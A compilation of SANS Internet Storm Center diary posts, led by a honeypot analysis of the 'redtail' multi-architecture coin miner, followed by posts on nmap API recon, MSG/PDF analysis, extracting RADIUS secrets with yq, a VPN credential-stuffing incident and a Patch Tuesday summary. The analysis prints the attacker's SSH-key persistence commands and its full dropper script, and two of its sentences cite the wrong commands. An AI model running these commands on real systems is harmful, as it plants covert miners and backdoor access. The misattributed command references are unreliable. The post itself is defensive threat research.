(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analysis of ?redtail? File Uploads to ICS Honeypot, a Multi-Architecture Coin Miner [Guest Diary], (Wed, May 22nd)

[This is a Guest Diary by Robert Riley, an ISC intern as part of the SANS.edu BACS program]

Introduction

Honeypot file uploads can be like opening pandoras box, never knowing what may get uploaded. Malware comes in all sorts of varieties and flavors, many suited for specific purposes and some for multiple. Today, we'll look at a malware named “redtail” and its purpose falls under the category, "Coin miners", software illegally uploaded to hosts for the purpose of covertly mining cryptocurrency for a remote actor by hijacking a host’s resources. The question we’d like answered is what capabilities do modern coin miners possess, and how can they be identified? Using this information from modern threat feeds could both give further insight into the threat actors perpetuating this attack, while also giving a glimpse into the current capabilities of coin miner malware actively being used in today’s threat landscape.

Description of the Subject

The “redtail” samples being evaluated are a look into a modern variant of coin miner malware being used in the wild today. The samples are interesting in that they have the capability to run on 4 different CPU architectures, showing just how much this malware could potentially infect a vast number of devices/hosts. We’ll be looking into the process of how the threat actor gained initial access, who are the threat actors, the different samples uploaded, and how these samples were identified as a coin miner.

Initial Analysis of the Attack

The analysis began in the form of an earlier attack observation [8]. I started by evaluating the IP 193.222.96.163, who was seen initially connected to the honeypot over SSH port 2222 on Feb 23rd 12:23:25 2024, shown as rapid logins happening back-to-back in increments of 23 (sign of bot behavior). After failing to login using the [root/lenovo] credentials, the actor successfully logs in using the [root/Passw0rd123] credentials. After authentication, the actor uploads a total of 5 files to the honeypot (redtail.arm7, redtail.arm8, redtail.i686, redtail.x86_64, setup.sh). 

The actor then runs commands that make the setup.sh file executable, then adds a custom public key to the ~/.ssh/authorized_keys file before making said file unmodifiable using the command https://www.abuseipdb.com/check/45.95.147.236. The full commands used are pated below:

chmod +x setup.sh; sh setup.sh;
rm -rf setup.sh;
mkdir -p ~/.ssh;
chattr -ia ~/.ssh/authorized_keys;
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys;
chattr +ai ~/.ssh/authorized_keys;
uname -a

Taking a closer look at the code for setup.sh shows us even more about the intentions of the remote IP. Namely, the shell script attempts to determine the host architecture based on the output of the command chattr +ai. Using this, the script copies the contents of the relevant redtail executable to the “.redtail” file on the host, and executes this new file, after which the original uploaded & unhidden redtail files are then deleted. If the architecture cannot be determined, then all the “redtail” file contents are copied to the “.redtail” file for good measure. The code is pasted below for more details:

#!/bin/bash

NOARCH=false;
ARCH="";
FOLDER="";

if [ -f "/bin/uname" ] && [ -f "/bin/grep" ]; then
        ARCH=$(uname -mp);
        if echo "$ARCH" | grep -q "x86_64" ; then
                ARCH="x86_64";
        elif echo "$ARCH" | grep -q "i686"; then
                ARCH="i686";
        elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
                ARCH="arm8";
        elif echo "$ARCH" | grep -q "armv7"; then
                ARCH="arm7";
        else
                NOARCH=true;
        fi
else
        NOARCH=true;
fi

#sysctl -w vm.nr_hugepages=$(nproc)

#for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
#do
#    echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";
#done

FOLDER=$(find / -writable -executable -readable -not -path "/proc/*" | head -n 1 || echo /tmp);
CURR=${PWD}

if [ "$CURR" != "$FOLDER" ]; then
        mv redtail.* $FOLDER
        cd $FOLDER
fi

if [ "$NOARCH" = true ]; then
        cat redtail.x86_64 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.i686 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.arm8 > .redtail; chmod +x .redtail; ./.redtail;
        cat redtail.arm7 > .redtail; chmod +x .redtail; ./.redtail;
else
        cat "redtail.$ARCH" > .redtail; chmod +x .redtail; ./.redtail;
fi

rm -rf redtail.*

Just doing a hash lookup on any of the redtail files, it can quickly be determined that its goal is that of a coin miner, as looking up the hash of each of the files in Virus Total tags these files with such labels. This sample showed behaviors such as executing crontab, modifying iptables rules, and shows UPX packing common in other coin miners, and listens on a newly created socket. 

Digging Deeper

The 1st IP, x.x.x.163, is located either in the Netherlands or France, and comes from the ISP Constant MOULIN. Doing a quick analysis using a few reputation sites for this IP, we see that this attack is one of the 1st recorded instances of its malicious behavior [2], a VT score of 23/90 [1], and a 100% confidence of abuse [4]. This IP still has reports still being generated today by both on my honeypot and in the wild. Regarding “redtail” file uploads, there are a recorded 5 separate times where this IP successful uploads “redtail” & “setup.sh” files to the honeypot. In each case before uploading, they successfully authenticate as the “root” user before. The most recent activity from this IP on the honeypot is as recent as 5/2, trying to guess SSH usernames & passwords. Below is the complete activity of this IP, with the 5 “redtail” submissions marked.

It gets more interesting when looking at all the IP's who tried to submit these "redtail" and "setup.sh" files, as there are only two IP's engaging in this activity: 193.222.96.163 & 45.95.147.236, the secondary IP being one we haven’t evaluated yet. This 2nd IP, x.x.x.236, located in the Netherlands, is from the Alsycon Media B.V. ISP. Doing a similar reputation analysis on this IP shows malicious activity as far back as 10/7/2024 [5], a VT score of 17/91 [4], and once again a 100% confidence of abuse [6]. For the honeypot, this IP was first seen on 1/28/2024, making it the 1st IP seen on the honeypot engaging in this activity. The IP tried to login via SSH using brute force, although curiously upon successfully logging disconnects shortly after. It isn’t until about 2 weeks later, on 2/11, that we see a successful “redtail” & “setup.sh” file uploads after authenticating using the [root/lenovo] username/password combo. The last time this IP is seen is on 3/20/2024, trying to login via SSH w/ the [root/a] username/password combo.

This is the only recorded instance of file uploads from this IP, as the address engages in a variety of behaviors against this endpoint compared to the primary IP, x.x.x.163. This includes connecting to various SSH ports, many different username/password submissions, and even URL requests at one point (w/ interesting user agents). It’s interesting to note that the primary IP, x.x.x.163, may also be geographically located in the Netherlands like the secondary IP, but can’t confirm for certain due to the ISP being spread across countries. The implication here is that if both IPs are from the NL, one could point to both these IP’s being from the same threat actor, but that is speculative. For the most part, however, most of the activity comes from the primary IP, x.x.x.163

Looking closer at the “redtail” and “setup.sh” files themselves by hash reveals interesting info on the IP’s who upload them to the honeypot. Out of the 28 unique hashes ever submitted, every single one of these file submissions had a Virus Total score of at least 19, another piece of evidence proving maliciousness [7]. Between the “redtail” files, each had unique hashes that were only used in the respective batch submission. This means that the 4/5 files submitted during the initial analysis of the primary IP submission on 2/23, that those files were never once used again by either IP. This applies to every one of the 6 batch submission of “redtail” files between both IP’s. The exception to this rule was regarding the “setup.sh” file, which had 2 hashes that were submitted twice on different dates. 

Conclusion

This analysis stuck out for a few reasons. One was the sheer number of file submissions, totaling over 400+ separate submissions over the course of about 4 months. Another was how all these submissions came from only 2 IP’s in roughly the same geographic area. These combine to show insight into more modern variants of coin miner malware, and the threat actors spreading this malware.

[1] https://www.virustotal.com/gui/ip-address/193.222.96.163 (23/90 VT score)
[2] https://isc.sans.edu/ipinfo/193.222.96.163 (5/10 risk score)
[3] https://www.abuseipdb.com/check/193.222.96.163 (100% confidence of abuse)
[4] https://www.virustotal.com/gui/ip-address/45.95.147.236 (17/91 VT score)
[5] https://isc.sans.edu/ipinfo/45.95.147.236 (0/10 risk score)
[6] https://www.abuseipdb.com/check/45.95.147.236 (100% confidence of abuse)
[7] “Hash Info.csv” – Sheet of all file submissions w/ info (attached)
[8] “Attack Observation #5.pdf” – AO where initial analysis of primary IP was done (attached)
[9] https://github.com/bruneaug/DShield-SIEM (provided visualizations)
[10] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

NMAP Scanning without Scanning (Part 2) - The ipinfo API, (Wed, May 22nd)

Going back a year or so, I wrote a story on the passive recon, specifically the IPINFO API (https://isc.sans.edu/diary/28596).  This API returns various information on an IP address: the registered owning organization and ASN, and a (usually reasonably accurate) approximation of where that IP might reside.
Looking at yesterday's story, I thought to myself, why not port my script from last year to an NMAP NSE script?  So I did!

Using the shodan-api nmap script as a template, I updated the following lines:

The actual API call of course is different:
  local response = http.get("ipinfo.io", 443, "/".. target .."/json?token=" .. registry.apiKey, {any_af = true})

This was a simple change, since the API key is still represented a a parameter in the URI this was just plug-n-play.

Also, because of differing return formats, in that same function I removed all the error checking of the returned values and replaced it with a simple return:
  return response.body

Note that there is a line
-- local apikey =""
If you want to embed your own API key into this script, remove the "--" (comment characters) and put your key in that line.

As with the Shodan script, you can tack IPINFO on to an existing active scan, or you can run it passively wiuth "-sn -Pn -n" as:

nmap -Pn -sn -n -P 8.8.8.8 --script ipinfo.nse --script-args "ipinfo.apikey=<your apikey goes here>"
Starting Nmap 7.92 ( https://nmap.org ) at 2024-05-21 11:34 Eastern Daylight Time
Nmap scan report for 8.8.8.8
Host is up.

Host script results:
| ipinfo: {
|   "ip": "8.8.8.8",
|   "hostname": "dns.google",
|   "anycast": true,
|   "city": "Mountain View",
|   "region": "California",
|   "country": "US",
|   "loc": "37.4056,-122.0775",
|   "org": "AS15169 Google LLC",
|   "postal": "94043",
|   "timezone": "America/Los_Angeles"
|_}

Post-scan script results:
|_ipinfo: IPInfo done: 0 hosts up.
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

Simple as that!  Now I can return host ownership and location info with my nmap scans, or if I'm in a hurry, instead of the normal nmap scan!  This information can be pretty handy when analyzing potential attacks, for instance looking at a failed authentication to see if the geography matches where that person could conceivably be - you only have to go back a few days for my post on VPN credential stuffing attacks for an example of this.

I've got one more of these APIs in the hopper - if you have another recon API you'd like to see in an nmap script, by all means let me know in our comment form!

All of my recon scripts (both the command-line and the nmap scripts) are posted in my github: https://github.com/robvandenbrink/recon_scripts

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scanning without Scanning with NMAP (APIs FTW), (Tue, May 21st)

A year ago I wrote up using Shodan's API to collect info on open ports and services without actually scanning for them (Shodan's API for the (Recon) Win!).  This past week I was trolling through the NMAP scripts directory, and imagine my surprise when I stumbled on shodan-api.nse.
So the network scanner we all use daily can be used to scan without actually scanning?  Apparently yes!

First the syntax:
nmap <target> --script shodan-api --script-args 'shodan-api.apikey=SHODANAPIKEY'
(note: use double quotes for script-args if you are doing this in Windows)

This still does a basic scan of the target host though.  To do this without scanning, without even sending any packets to your host, add:

-sn do a ping scan (ie we're not doing a port scan)
-Pn Don't ping the host, just assume that it's online

Neat trick there eh?  This essentially tells nmap to do nothing for each host in the target list, but don't forget that script we asked you to run!

This also has the advantage of doing the "scan" even if the host is down (or doesn't return on a ping)

Plus, just to be complete:
-n  Don't even do DNS resolution
This way NMAP isn't sending anything to the host or even to hosts under the client's control (for instance if they happen to host their own DNS).

If you're doing a whole subnet, or the output is large enough to scroll past your buffer, or if you want much (much) more useful output, add this to your script-args clause:
shodan-api.outfile=outputfile.csv

Let's put this all together:

nmap -sn -Pn -n www.cisco.com --script shodan-api --script-args "shodan-api.outfile=out.csv,shodan-api.apikey=<my-api-key-not-yours>"
Starting Nmap 7.92 ( https://nmap.org ) at 2024-05-17 09:53 Eastern Daylight Time
Nmap scan report for www.cisco.com (184.26.152.97)
Host is up.

Host script results:
| shodan-api: Report for 184.26.152.97 (www.static-cisco.com, www.cisco.com, www.mediafiles-cisco.com, www-cloud-cdn.cisco.com, a184-26-152-97.deploy.static.akamaitechnologies.com)
| PORT  PROTO  PRODUCT      VERSION
| 80    tcp    AkamaiGHost
|_443   tcp    AkamaiGHost

Post-scan script results:
| shodan-api: Shodan done: 1 hosts up.
|_Wrote Shodan output to: out.csv
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds

Neat eh?  It collects the product and version info (when it can get it).  The CSV file looks like this:

IP,Port,Proto,Product,Version
184.26.152.97,80,tcp,AkamaiGHost,
184.26.152.97,443,tcp,AkamaiGHost,

This file format is a direct import into a usable format in powershell, python or just about any tool you might desire, even Excel :-)

Looking at a more "challenging" scan target:

nmap -sn -Pn -n isc.sans.edu --script shodan-api --script-args "shodan-api.outfile=out.csv,shodan-api.apikey=<my-api-key-not-yours>"

IP,Port,Proto,Product,Version
45.60.103.34,25,tcp,,
45.60.103.34,43,tcp,,
45.60.103.34,53,tcp,,
45.60.103.34,53,udp,,
.. and so on.

Look at line 4!  If you've ever done a UDP scan, you know that it can take for-e-ver!  Since this is just an api call, it collects both tcp and udp info from Shodan.

How many ports are in the output?
type out.csv | wc -l
    160

159 ports, that's how many! (subtract one for the header line)  This would have taken a while with a regular port scan, but with a shodan query it finishes in how long?

Post-scan script results:
| shodan-api: Shodan done: 1 hosts up.
|_Wrote Shodan output to: out.csv
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds

Yup, 1.2 seconds!

This script is a great addition to nmap, it allows you to do a quick and dirty scan for what ports and services have been available recently, with a bit of rudimentary info attached.

Did you catch that last hint?  If you're doing a pentest, it's well worth digging into that word "recently".  Looking at ports that are in the shodan list, but aren't in a real portscan (that you'd get from nmap -sT or -sU) can be very interesting.  These are services that the client has recently disabled, maybe just for the duration  of the pentest.  For instance, that FTP server or totally vulnerable web or application server that they have open "only when they need it" (translation: always, except for during the annual pentest).  If you can pull a diff report between what's in the shodan output and what's actually there now, that's well worth looking into, say for instance using archive.org.  If you do find something good, my bet is that it falls into your scope!  If not, you should update your scope to "services found during the test in the target IP ranges or DNS scopes" or similar.  You don't want something like this excluded simply because it's (kinda) not there during the actual assessment :-)

Got another API you'd like to see used in NMAP?  Please use our comment form.  Stay tuned I have a list, but if you've got one I haven't thought of I'm happy to add anohter one!

===============
Rob VandenBrink
rob<at>coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Analyzing MSG Files, (Mon, May 20th)

.msg email files are ole files and can be analyzed with my tool oledump.py.

They have a lot of streams, so finding the information you need (body, headers, attachments, ...) can take some time searching.

That's why I have a plugin that summarizes important information from .msg files: plugin_msg.summary.py.

This is how its output looks like when I run it on a .msg file with malicious attachment:

While showing a friend my plugin features, I got the idea to make some updates to this plugin.

First, when attachments are inline and/or hidden, that information is added to the attachment overview, as can be seen in the screenshot above for attachment 0.

Inline attachments are typically pictures that have been pasted into the email's body, and do not appear as seperate attachments when opened in Outlook, for example.

If you are analyzing an email for malicious attachments, you can first focus on attachments that are not inline.

This information also appears when outputing JSON information for the analyzed .msg file:

Second, I added a new option to output JSON information for the attachments with their contents, so that these attachments can be analyzed as I explained in recent diary entries "Analyzing PDF Streams" and "Another PDF Streams Example: Extracting JPEGs".

This JSON output can be piped into my other tools that support this JSON format, like file-magic.py (to identify the file type based on its content):

If an attachment is inline and/or hidden, this -J output option prefixes the attachment name in the JSON output:

And I also updated my plugin plugin_msg.py to parse property streams. This is where information like inline and hidden are stored:

As can be seen in the screenshots, there are also properties for timestamps like creatiion time and last modification time.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Another PDF Streams Example: Extracting JPEGs, (Fri, May 17th)

In my diary entry "Analyzing PDF Streams" I showed how to use my tools file-magic.py and myjson-filter.py together with my PDF analysis tool pdf-parser.py to analyze PDF streams en masse.

In this diary entry, I will show how file-magic.py can augment JSON data produced by pdf-parser.py with file-type information that an then be used by myjson-filter.py to filter out files you are interested in. As an example, I will extract all JPEGs from a PDF document.

First, let's produce statistics with pdf-parser.py's option -a:

This confirms that there are many "Indirect objects with a stream" in this document.

Next, I let pdf-parser.py produce JSON output (--jsonoutput) with the content of the unfiltered streams, and I let file-magic.py consume this JSON output (--jsoninput) to try to identify the file type of each stream based on its content (since streams don't have a filename, there is no filename extension and we need to look at the content):

If we use option -t to let file-magic.py just output the file type (and not the file/stream name), we can make statistics with my tool count.py and see that the PDF document contains many JPEG files:

Now we want to write all of these JPEG images to disk. We use file-magic.py again in JSON mode, but let it also output the same JSON data augmented with file-type information (--jsonoutput):

Next, this JSON data is consumed by myjson-filter.py and filtered with regular expression (case sensitive) JPEG on the file type: -t JPEG.

Finally, we write the JPEG images to disk with -W hashext:jpeg: this writes each JPEG stream to disk with a filename consisting of the sha256 of the file's content and extension .jpeg.

By using the hash of the content as filename, there are no duplicate pictures:

Should you want to reproduce the commands in these diary entries with the exact same PDF files I used, my old ebook on PDF analysis can be found here and the analysis on TLS backdoors done by a colleague can be found here.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Why yq? Adventures in XML, (Thu, May 16th)

I was recently asked to <ahem> "recover" a RADIUS key from a Microsoft NPS server.  No problem I think, just export the config and it's all there in clear text right?

... yes, sort of ...

The XML file that gets output is of course perfect XML, but that doesn't mean it's easy to read for a human, it's as scrambled as my weekend eggs.  I got my answer, but then of course started to look for a way to get the answer in an easier way, something I could document and hand off to my client.  In other words, I started on the quest for a "jq" like tool for XML.  Often security work involves taking input in one text format and converting it to something that's human readable, or more easily parsed by the next tool in the pipeline.  (see below)

XMLLint is a pretty standard one that's in Linux, you can get it by installing libxml2.  Kali has it installed by default - usage is very straightforward:

xmllint < file.xml

or

cat file.xml | xmllint

There are a bunch of output options, but because it's not-so windows friendly I didn't dig to far - run man xmllint or browse here: https://gnome.pages.gitlab.gnome.org/libxml2/xmllint.html  if you need more than the basics on this.

However, finding something like this for Windows turned into an adventure, there's a port of xmllint for Windows but it's in that 10-year age range that makes me a bit leary to install it.  With a bit of googling I found yq.

This is a standalone install on most Linux distro's (sudo apt-get install yq or whatever), and has a few standard install methods for windows:

  • you can just download the binary and put it in your path
  • choco install yq
  • winget install --id MikeFarah.yq

yq is written to mimic jq like you'd expect from the name, but will take json, yaml, xml, csv and tsv files.  It's not as feature-heavy as jq, but it's got enough, and let's face it, most of us use these for pretty print output, so that we can grep against that anyway.
I especially liked it for today's problem because I can adjust the indent, since the NPS XML export has a fairly deep heirarchy I went with an indent of 1:

type nps-export.xml | yq --input-format xml --output-format xml --indent 1 > pretty.xml

A quick peek at the file found me my answwer in the pretty (and grep-able) format that I wanted.  A typical RADIUS Client section looks lke:

 <Clients name="Clients">
  <Children>
   <DEVICE name="DEVICENAME">
    <Properties>
     <Client_ _Template_Guid="_Template_Guid" xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">{00000000-0000-0000-0000-000000000000}</Client_>
     <IP_Address xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">IP.Address.Goes.Here</IP_Address>
     <NAS_Manufacturer xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="int">0</NAS_Manufacturer>
     <Opaque_Data xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></Opaque_Data>
     <Radius_Client_Enabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</Radius_Client_Enabled>
     <Require_Signature xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">0</Require_Signature>
     <Shared_Secret xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">SuperSecretSharedKeyGoesHere</Shared_Secret>
     <Template_Guid xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">{1A1917B8-D2C0-43B3-8144-FAE167CE9316}</Template_Guid>
    </Properties>


Or I could dump all the shared secrets with the associated IP Addresses with:

type pretty.xml | findstr "IP_Address Shared_Secret"

or

cat pretty.xml | grep 'IP_address\|Shared_Secret'

After all that, I think I've found my go-to for text file conversions - in particular xml or yaml, especially in Windows ..

Full details on these two tools discussed:
https://github.com/mikefarah/yq
https://linux.die.net/man/1/xmllint

If you've got a different text formatter (or un-formatter), or if you've used xmllint or yq in an interesting way, please let us know about it in our comment form!

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Got MFA? If not, Now is the Time!, (Wed, May 15th)

I had an interesting call from a client recently - they had a number of "net use" and "psexec" commands pop up on a domain controller, all called from PSEXEC (thank goodness for a good EDR deployed across the board!!).  The source IP was a VPN session.

Anyway, we almost immediately declared an incident, and the VPN that was in use that had just Userid / Password authentication was the ingress.  We found a US employee with an active VPN session from Europe (the classic "impossible geography session") - so the standard "kill the session, deactivate the account / change the password action" ensued.
Followed by a serious conversation - really your userid/password protected VPN is only as strong as your weakest password.  Any you KNOW that some folks have kept their "Welcome123" password that they got at their last "I forgot my password" helpdesk call.  Also, your userid/password VPN is only as strong as the weakest other site that your folks have used their work credentials for.

Anyway the actions and discussion above was followed by the "who would want to target us?" conversation, so off to the logs we went.

The standard Cisco VPN rejected login syslog message looks like this:

Local4.Info     <fw.ip.add.ress>    %ASA-6-113005: AAA user authentication Rejected : reason = AAA failure : server = <rad.ius.server.ip> : user = ***** : user IP = <att.ack.er.ip>

So, we started by dumping all the Rejected logins for the day (note that this client has syslog in Windows):

type fw.ip.add.ress.txt | find "Rejected" > aaafail.txt

Now let's see how many events we have in a day:

type aaafail.txt | wc -l
 196500

Let's look at a representative timeslice.  We'll look at:

  • 5pm-6pm (so the time is 17:xx)
  • remove any repeating space characters (tr -s " ")
  • field 24 is the souce IP address, extract that with "cut"
  • sort | uniq -c  Give me just uniq addresses, with counts, sorted in descending order
  • After that, I'm just looking (manually) at the attacking hosts with a 10 count or higher
type aaafail.txt | find " 17:" | tr -s " " | cut -d " " -f 24 | sort | uniq -c | sort /r
    670 207.180.247.77
     33 80.94.95.200
     18 45.135.232.63
     15 45.140.17.49
     15 45.140.17.44
     15 45.135.232.98
     14 45.140.17.63
     14 45.140.17.54
     14 45.140.17.47
     14 45.135.232.94
     14 45.135.232.101
     14 45.135.232.100
     14 45.134.26.25
     14 193.143.1.62
     13 91.202.233.3
     13 45.140.17.41
     13 45.135.232.89
     13 45.135.232.26
     13 45.134.26.6
     10 31.41.244.44

The first thing we notice is that the first IP stands out, so let's block that.
Now we'll look at those IP's a bit closer using ipinfo, see my story on this utility here: https://isc.sans.edu/diary/Using+Passive+DNS+sources+for+Reconnaissance+and+Enumeration/28596

ipinfo  207.180.247.77
IPINFO OUTPUT
{
  "ip": "207.180.247.77",
  "hostname": "cp.srv.plusdatacenter.com",
  "city": "Frankfurt am Main",
  "region": "Hesse",
  "country": "DE",
  "loc": "50.1155,8.6842",
  "org": "AS51167 Contabo GmbH",
  "postal": "60306",
  "timezone": "Europe/Berlin"
}

Next we note that these "top 20" hosts generate 953 requests out of the for the hour, so this really does look like 1 outlier, plus ~19-20 hosts in a managed cluster.

OK, let's look at those other two subnets that are over-represented in this top 20 list:

ipinfo 45.140.0.0
IPINFO OUTPUT
{
  "ip": "45.140.0.0",
  "city": "Sandnes",
  "region": "Rogaland",
  "country": "NO",
  "loc": "58.8524,5.7352",
  "org": "AS201454 UPHEADS AS",
  "postal": "4301",
  "timezone": "Europe/Oslo"
}

ipinfo 45.135.0.0
IPINFO OUTPUT
{
  "ip": "45.135.0.0",
  "city": "Kyiv",
  "region": "Kyiv City",
  "country": "UA",
  "loc": "50.4547,30.5238",
  "org": "AS208467 MagicService LLC",
  "postal": "03027",
  "timezone": "Europe/Kyiv"
}

Note that we're 3 searches in and we still haven't found of the traditional "boogeyman".  No Russia, no DPRK, no Iran (yet).

So, keeping in mind that we're just playing with part of the attack, I started blocking subnets, ASN's, and countries.

We blocked the subnets above, and the attack shifted within seconds to ramp up from a Cloud Service Provider in Germany.  We blocked their address space, and it shifted to a CSP in France.  Two more CSP's later, and we finally cut the "top 20" volumes down, and our high volume hosts were down to 5 hosts in Russia.
Blocking Russia shifted the attack to India, then South America.  

You see the patterns here, and have hopefully drawn the same conclusions.

The attackers have pre-built "malicious assets" wherever they can spin up legitimate free or low cost cloud hosts.  The attacker is not attacking from their own IP space or even thier own country.  The entire thing is automated, over the course of that day we saw malicious attacks from roughly 1100 IP addresses as we blocked various subnets and ASNs for various (mostly legitimate) cloud providers.

Looking at the other half of the equation, this attacker in particular was using account names that were not related to the organization being attacked - the userid's being used were a mix of all formats plus favourites such as admin, administrator and root.  So it looks like they were using a combination of standard password dumps as input.  I'd have been more concerned - and wouldn't have played around so much - if the attacker had harvested user account info from LinkedIn and similar sources.  If the credential stuffing attack contains mostly legitimate people names, the chances of success are WAY higher - they're most likely combining legit names with password dump data that matches those names.  Normally we see this sort of thing with red team or more targeted malicious activity, where the per-company costs are a bit higher but because things are targetted, the attack tends to succeed sooner.  In that situation we'd have likely shut down the VPN and implemented MFA offline.  Password dump files such as this are easy to come by, and are generally free - though you can certainly purchase access targeted lists or even purchase access to particular companies from "access as a Service" companies in the "criminal supply chain".  Don't believe folks who use phrases like "the dark web" when describing these (though that does exist too)

Needless to say, we did a crash migration to MFA for their VPN, we had them over within a couple of hours of making the decision.  Since their email was already using MFA, this was free and no fuss at all (thanks Microsoft!) - the MFA prompts were already familiar to the user base.

Lessons learned?

  • Nobody is targetting you, they are targetting everyone that hasn't implemented MFA.  Or possibly targetting even the MFA sites, since it's tough to tell either way until you get to the MFA prompt.  
  • Also from the connection volumes, the attackers were very careful not to lock out accounts.  Each IP address has roughly 15 attempts max in an hour, so that's once every ~4 minutes.
  • With just one hit every 4 minutes, just this one example cluster has gobs of capacity to easily scale up to easily target hundreds of other organizations.
  • They are targeting VPNs.  None of this "pivot through a website" gymnastics, then "pivot out of the DMZ" heartache, they're after the front door and full access to the network.  Though they're still targeting websites too.  Anything with a login prompt is fair game.
  • This entire thing is automated.  As I shut down each cluster of addresses, a new cluster would pop up elsewhere in the world within seconds.  The old cluster is still chugging along against its other targets.
  • The cluster of hosts at any given time likely are not the actual attacking hosts.  Remember, the attackers have a significant application and data management challenge here.  They need to centrally store the "prospective credentials" and actual compromised credentials, as well as keep track of hundreds of targets and where each target is in the campaign.  So these clusters of hosts are likely proxy servers being used by a central cluster of actual servers backed by a database and a decent application, or at least a pretty good script.  This means my estimate of hundreds of targets is likely on the light side.
  • Geo-blocking is getting less useful over time - while we still do see attacks from the countries you might expect, anyone who is any good has automation to either source their attack from almost anywhere, and once they see you blocking them, from anywhere else.  This argues further for central control and data management, since I'd bet only our attacker's proxy servers were jumping from datacenter to datacenter, there's no profit  in moving the attack against any given organization unless you have to.  This means that "we are being targeted by country x" are very difficult to attribute (this is not new)
  • The foreign influence attacks" (check the media lately in Canada) headlines aren't worth the headline - OF COURSE the attack is coming from outside of your country.  Nobody is going to mount an attack where their local constabularly can roll up and knock down their door.  These folks take great pains (usually) to operate in countries that their government doesn't play so nice with.  Good luck finding the actual servers though, unless you compromise a proxy host that is (this may not be legal in your jurisdiction, this was NOT advice)
  • Attack styles do tend to come in waves.  The classic "drop powershell to download the malware" email attacks have declined somewhat since Microsoft blocked most scripting in Office.  We had "whale phishing" attacks that drove MFA for email a couple of years back.  In more recent times we've seen attacks against vulnerabilities in everyone's edge appliances (firewalls, vpn's, file transfer, terminal service proxies etc).  Credential stuffing against userid/passwords seem to be seeing an uptick lately.  But guess what, they're all in play, all the time - none of these are new, and just because one hits the headlines doesn't mean the others are not just as active as they were last month or last year.  Credential stuffing attacks very much like this one have been a part of the landscape since the 90's (or before), they're just too cheap and easy to set and forget for the attacker, especially these days.

The "moral of the story"?

  • If you haven't implemented MFA, now is the time.
  • If you have just userid/password protection on your VPN and are not compromised, you likely will be soon.
  • If you think you're not compromised, that doesn't mean that you're not.  The attacker in this incident is likely not the only one, and is likely not even the only one from today.  They'll likely sell any compromised credentials to the real attacker that's in it for extortion of one kind or another.  That real attacker likely is purchasing the credentials from one provider, the malware from another and so on - the bad guys are just as much focused on "As A Service" as regular IT teams. In fact, the attackers are regular IT teams, just (mostly) operating outside of their target jurisdictions.
  • So you might be compromised a good long time before you see anything obvious in your daily operations that will tell you that you have a problem.
  • If you are still running simple antivirus, you need to look at better options.  
  • If you don't have a SIEM that will alert you to attacks that show up in your logs, then you won't know about your attacks until they succeed.


Anyway, this story went on longer than I had planned.  Long story short, if you have anything (VPN, Website, SSH, application, whatever) facing the internet that has a simple userid / password login, then you should probably rethink that decision in 2024.

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Microsoft May 2024 Patch Tuesday, (Tue, May 14th)

This month we got patches for 67 vulnerabilities. Of these, 1 are critical, and 1 is being exploited according to Microsoft.

The critical vulnerability is a Remote Code Execution (RCE) affecting the Microsoft Sharepoint Server (CVE-2024-30044). According to the advisory, an authenticated attacker with Site Owner permissions or higher could upload a specially crafted file to the targeted Sharepoint Server and craft specialized API requests to trigger deserialization of file's parameters. This would enable the attacker to perform remote code execution in the context of the Sharepoint Server. The CVSS for the vulnerability is 8.8.

The zero-day vulnerability is an elevation of privilege on Windows DWM (Desktop Windows Management) Core Library (CVE-2024-30051). According to the advisory, an attacker who successfully exploited this vulnerability could gain SYSTEM privileges. The CVSS for the vulnerability is 7.8.

